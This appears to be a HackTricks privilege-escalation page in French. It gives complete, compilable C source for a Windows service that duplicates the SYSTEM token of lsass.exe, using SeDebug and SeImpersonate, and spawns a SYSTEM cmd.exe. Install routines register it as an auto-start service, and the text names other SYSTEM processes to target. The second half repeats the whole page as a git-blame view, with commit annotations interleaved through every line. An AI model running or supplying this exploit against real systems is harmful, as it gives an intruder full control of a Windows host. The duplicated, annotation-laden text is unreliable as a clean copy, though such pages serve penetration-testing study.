hacktricks/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md

<details>

<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>

Autres façons de soutenir HackTricks :

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>


Le code suivant **exploite les privilèges SeDebug et SeImpersonate** pour copier le jeton d'un **processus s'exécutant en tant que SYSTEM** et avec **tous les privilèges du jeton**. \
Dans ce cas, ce code peut être compilé et utilisé comme un **binaire de service Windows** pour vérifier son bon fonctionnement.\
Cependant, la partie principale du **code où l'élévation se produit** se trouve à l'intérieur de la **fonction `Exploit`**.\
À l'intérieur de cette fonction, vous pouvez voir que le **processus **_**lsass.exe**_** est recherché**, puis son **jeton est copié**, et enfin ce jeton est utilisé pour lancer un nouveau _**cmd.exe**_ avec tous les privilèges du jeton copié.

D'autres processus s'exécutant en tant que SYSTEM avec tous ou la plupart des privilèges du jeton sont : **services.exe**, **svhost.exe** (l'un des premiers), **wininit.exe**, **csrss.exe**... (_n'oubliez pas que vous ne pourrez pas copier un jeton à partir d'un processus protégé_). De plus, vous pouvez utiliser l'outil [Process Hacker](https://processhacker.sourceforge.io/downloads.php) s'exécutant en tant qu'administrateur pour voir les jetons d'un processus.
```c
// From https://cboard.cprogramming.com/windows-programming/106768-running-my-program-service.html
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#pragma comment (lib, "advapi32")

TCHAR* serviceName = TEXT("TokenDanceSrv");
SERVICE_STATUS serviceStatus;
SERVICE_STATUS_HANDLE serviceStatusHandle = 0;
HANDLE stopServiceEvent = 0;

//This function will find the pid of a process by name
int FindTarget(const char *procname) {

HANDLE hProcSnap;
PROCESSENTRY32 pe32;
int pid = 0;

hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (INVALID_HANDLE_VALUE == hProcSnap) return 0;

pe32.dwSize = sizeof(PROCESSENTRY32);

if (!Process32First(hProcSnap, &pe32)) {
CloseHandle(hProcSnap);
return 0;
}

while (Process32Next(hProcSnap, &pe32)) {
if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
pid = pe32.th32ProcessID;
break;
}
}

CloseHandle(hProcSnap);

return pid;
}


int Exploit(void) {

HANDLE hSystemToken, hSystemProcess;
HANDLE dupSystemToken = NULL;
HANDLE hProcess, hThread;
STARTUPINFOA si;
PROCESS_INFORMATION pi;
int pid = 0;


ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));

// open high privileged process
if ( pid = FindTarget("lsass.exe") )
hSystemProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
else
return -1;

// extract high privileged token
if (!OpenProcessToken(hSystemProcess, TOKEN_ALL_ACCESS, &hSystemToken)) {
CloseHandle(hSystemProcess);
return -1;
}

// make a copy of a token
DuplicateTokenEx(hSystemToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &dupSystemToken);

// and spawn a new process with higher privs
CreateProcessAsUserA(dupSystemToken, "C:\\windows\\system32\\cmd.exe",
NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);

return 0;
}


void WINAPI ServiceControlHandler( DWORD controlCode ) {
switch ( controlCode ) {
case SERVICE_CONTROL_SHUTDOWN:
case SERVICE_CONTROL_STOP:
serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
SetServiceStatus( serviceStatusHandle, &serviceStatus );

SetEvent( stopServiceEvent );
return;

case SERVICE_CONTROL_PAUSE:
break;

case SERVICE_CONTROL_CONTINUE:
break;

case SERVICE_CONTROL_INTERROGATE:
break;

default:
break;
}
SetServiceStatus( serviceStatusHandle, &serviceStatus );
}

void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {
// initialise service status
serviceStatus.dwServiceType = SERVICE_WIN32;
serviceStatus.dwCurrentState = SERVICE_STOPPED;
serviceStatus.dwControlsAccepted = 0;
serviceStatus.dwWin32ExitCode = NO_ERROR;
serviceStatus.dwServiceSpecificExitCode = NO_ERROR;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;

serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );

if ( serviceStatusHandle ) {
// service is starting
serviceStatus.dwCurrentState = SERVICE_START_PENDING;
SetServiceStatus( serviceStatusHandle, &serviceStatus );

// do initialisation here
stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );

// running
serviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
serviceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus( serviceStatusHandle, &serviceStatus );

Exploit();
WaitForSingleObject( stopServiceEvent, -1 );

// service was stopped
serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
SetServiceStatus( serviceStatusHandle, &serviceStatus );

// do cleanup here
CloseHandle( stopServiceEvent );
stopServiceEvent = 0;

// service is now stopped
serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
serviceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus( serviceStatusHandle, &serviceStatus );
}
}


void InstallService() {
SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );

if ( serviceControlManager ) {
TCHAR path[ _MAX_PATH + 1 ];
if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {
SC_HANDLE service = CreateService( serviceControlManager,
serviceName, serviceName,
SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,
0, 0, 0, 0, 0 );
if ( service )
CloseServiceHandle( service );
}
CloseServiceHandle( serviceControlManager );
}
}

void UninstallService() {
SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );

if ( serviceControlManager ) {
SC_HANDLE service = OpenService( serviceControlManager,
serviceName, SERVICE_QUERY_STATUS | DELETE );
if ( service ) {
SERVICE_STATUS serviceStatus;
if ( QueryServiceStatus( service, &serviceStatus ) ) {
if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )
DeleteService( service );
}
CloseServiceHandle( service );
}
CloseServiceHandle( serviceControlManager );
}
}

int _tmain( int argc, TCHAR* argv[] )
{
if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {
InstallService();
}
else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {
UninstallService();
}
else  {
SERVICE_TABLE_ENTRY serviceTable[] = {
{ serviceName, ServiceMain },
{ 0, 0 }
};

StartServiceCtrlDispatcher( serviceTable );
}

return 0;
}
```
<details>

<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>

D'autres façons de soutenir HackTricks :

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`<details>`

Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:51:21 +00:00			`<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:51:21 +00:00			`Autres façons de soutenir HackTricks :`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:51:21 +00:00			`* Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Découvrez [La famille PEASS](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['forensics/basic-forensic-methodology/README.md', 'forensics 2024-02-09 01:31:34 +00:00			`* Rejoignez le 💬 [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou suivez-nous sur Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:51:21 +00:00			`* Partagez vos astuces de piratage en soumettant des PR aux [HackTricks](https://github.com/carlospolop/hacktricks) et [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00
			`</details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:51:21 +00:00			`Le code suivant exploite les privilèges SeDebug et SeImpersonate pour copier le jeton d'un processus s'exécutant en tant que SYSTEM et avec tous les privilèges du jeton. \`
			`Dans ce cas, ce code peut être compilé et utilisé comme un binaire de service Windows pour vérifier son bon fonctionnement.\`
			Cependant, la partie principale du code où l'élévation se produit se trouve à l'intérieur de la fonction `Exploit`.\
			`À l'intérieur de cette fonction, vous pouvez voir que le processus _lsass.exe_ est recherché, puis son jeton est copié, et enfin ce jeton est utilisé pour lancer un nouveau _cmd.exe_ avec tous les privilèges du jeton copié.`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:51:21 +00:00			`D'autres processus s'exécutant en tant que SYSTEM avec tous ou la plupart des privilèges du jeton sont : services.exe, svhost.exe (l'un des premiers), wininit.exe, csrss.exe... (_n'oubliez pas que vous ne pourrez pas copier un jeton à partir d'un processus protégé_). De plus, vous pouvez utiliser l'outil [Process Hacker](https://processhacker.sourceforge.io/downloads.php) s'exécutant en tant qu'administrateur pour voir les jetons d'un processus.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```c
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:51:21 +00:00			`// From https://cboard.cprogramming.com/windows-programming/106768-running-my-program-service.html`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`#include <windows.h>`
			`#include <tlhelp32.h>`
			`#include <tchar.h>`
			`#pragma comment (lib, "advapi32")`

			`TCHAR* serviceName = TEXT("TokenDanceSrv");`
			`SERVICE_STATUS serviceStatus;`
			`SERVICE_STATUS_HANDLE serviceStatusHandle = 0;`
			`HANDLE stopServiceEvent = 0;`

			`//This function will find the pid of a process by name`
			`int FindTarget(const char *procname) {`

Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`HANDLE hProcSnap;`
			`PROCESSENTRY32 pe32;`
			`int pid = 0;`

			`hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);`
			`if (INVALID_HANDLE_VALUE == hProcSnap) return 0;`

			`pe32.dwSize = sizeof(PROCESSENTRY32);`

			`if (!Process32First(hProcSnap, &pe32)) {`
			`CloseHandle(hProcSnap);`
			`return 0;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`while (Process32Next(hProcSnap, &pe32)) {`
			`if (lstrcmpiA(procname, pe32.szExeFile) == 0) {`
			`pid = pe32.th32ProcessID;`
			`break;`
			`}`
			`}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`CloseHandle(hProcSnap);`

			`return pid;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`


Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`int Exploit(void) {`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`HANDLE hSystemToken, hSystemProcess;`
			`HANDLE dupSystemToken = NULL;`
			`HANDLE hProcess, hThread;`
			`STARTUPINFOA si;`
			`PROCESS_INFORMATION pi;`
			`int pid = 0;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00

Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`ZeroMemory(&si, sizeof(si));`
			`si.cb = sizeof(si);`
			`ZeroMemory(&pi, sizeof(pi));`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`// open high privileged process`
			`if ( pid = FindTarget("lsass.exe") )`
			`hSystemProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);`
			`else`
			`return -1;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`// extract high privileged token`
			`if (!OpenProcessToken(hSystemProcess, TOKEN_ALL_ACCESS, &hSystemToken)) {`
			`CloseHandle(hSystemProcess);`
			`return -1;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`// make a copy of a token`
			`DuplicateTokenEx(hSystemToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &dupSystemToken);`

			`// and spawn a new process with higher privs`
			`CreateProcessAsUserA(dupSystemToken, "C:\\windows\\system32\\cmd.exe",`
			`NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);`

			`return 0;`
			`}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00

Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`void WINAPI ServiceControlHandler( DWORD controlCode ) {`
			`switch ( controlCode ) {`
			`case SERVICE_CONTROL_SHUTDOWN:`
			`case SERVICE_CONTROL_STOP:`
			`serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;`
			`SetServiceStatus( serviceStatusHandle, &serviceStatus );`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`SetEvent( stopServiceEvent );`
			`return;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`case SERVICE_CONTROL_PAUSE:`
			`break;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`case SERVICE_CONTROL_CONTINUE:`
			`break;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`case SERVICE_CONTROL_INTERROGATE:`
			`break;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`default:`
			`break;`
			`}`
			`SetServiceStatus( serviceStatusHandle, &serviceStatus );`
			`}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {`
			`// initialise service status`
			`serviceStatus.dwServiceType = SERVICE_WIN32;`
			`serviceStatus.dwCurrentState = SERVICE_STOPPED;`
			`serviceStatus.dwControlsAccepted = 0;`
			`serviceStatus.dwWin32ExitCode = NO_ERROR;`
			`serviceStatus.dwServiceSpecificExitCode = NO_ERROR;`
			`serviceStatus.dwCheckPoint = 0;`
			`serviceStatus.dwWaitHint = 0;`

			`serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );`

			`if ( serviceStatusHandle ) {`
			`// service is starting`
			`serviceStatus.dwCurrentState = SERVICE_START_PENDING;`
			`SetServiceStatus( serviceStatusHandle, &serviceStatus );`

			`// do initialisation here`
			`stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );`

			`// running`
			`serviceStatus.dwControlsAccepted \|= (SERVICE_ACCEPT_STOP \| SERVICE_ACCEPT_SHUTDOWN);`
			`serviceStatus.dwCurrentState = SERVICE_RUNNING;`
			`SetServiceStatus( serviceStatusHandle, &serviceStatus );`

			`Exploit();`
			`WaitForSingleObject( stopServiceEvent, -1 );`

			`// service was stopped`
			`serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;`
			`SetServiceStatus( serviceStatusHandle, &serviceStatus );`

			`// do cleanup here`
			`CloseHandle( stopServiceEvent );`
			`stopServiceEvent = 0;`

			`// service is now stopped`
			`serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP \| SERVICE_ACCEPT_SHUTDOWN);`
			`serviceStatus.dwCurrentState = SERVICE_STOPPED;`
			`SetServiceStatus( serviceStatusHandle, &serviceStatus );`
			`}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`


			`void InstallService() {`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );`

			`if ( serviceControlManager ) {`
			`TCHAR path[ _MAX_PATH + 1 ];`
			`if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {`
			`SC_HANDLE service = CreateService( serviceControlManager,`
			`serviceName, serviceName,`
			`SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,`
			`SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,`
			`0, 0, 0, 0, 0 );`
			`if ( service )`
			`CloseServiceHandle( service );`
			`}`
			`CloseServiceHandle( serviceControlManager );`
			`}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

			`void UninstallService() {`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );`

			`if ( serviceControlManager ) {`
			`SC_HANDLE service = OpenService( serviceControlManager,`
			`serviceName, SERVICE_QUERY_STATUS \| DELETE );`
			`if ( service ) {`
			`SERVICE_STATUS serviceStatus;`
			`if ( QueryServiceStatus( service, &serviceStatus ) ) {`
			`if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )`
			`DeleteService( service );`
			`}`
			`CloseServiceHandle( service );`
			`}`
			`CloseServiceHandle( serviceControlManager );`
			`}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

			`int _tmain( int argc, TCHAR* argv[] )`
			`{`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {`
			`InstallService();`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {`
			`UninstallService();`
			`}`
			`else {`
			`SERVICE_TABLE_ENTRY serviceTable[] = {`
			`{ serviceName, ServiceMain },`
			`{ 0, 0 }`
			`};`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`StartServiceCtrlDispatcher( serviceTable );`
			`}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 14:32:10 +00:00			`return 0;`
			`}`
			```
			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:51:21 +00:00			`<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/README.md', 'forensics 2024-02-09 01:31:34 +00:00			`D'autres façons de soutenir HackTricks :`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/README.md', 'forensics 2024-02-09 01:31:34 +00:00			`* Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:51:21 +00:00			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Découvrez [La famille PEASS](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['forensics/basic-forensic-methodology/README.md', 'forensics 2024-02-09 01:31:34 +00:00			`* Rejoignez le 💬 [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou suivez-nous sur Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Partagez vos astuces de piratage en soumettant des PR aux [HackTricks](https://github.com/carlospolop/hacktricks) et [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`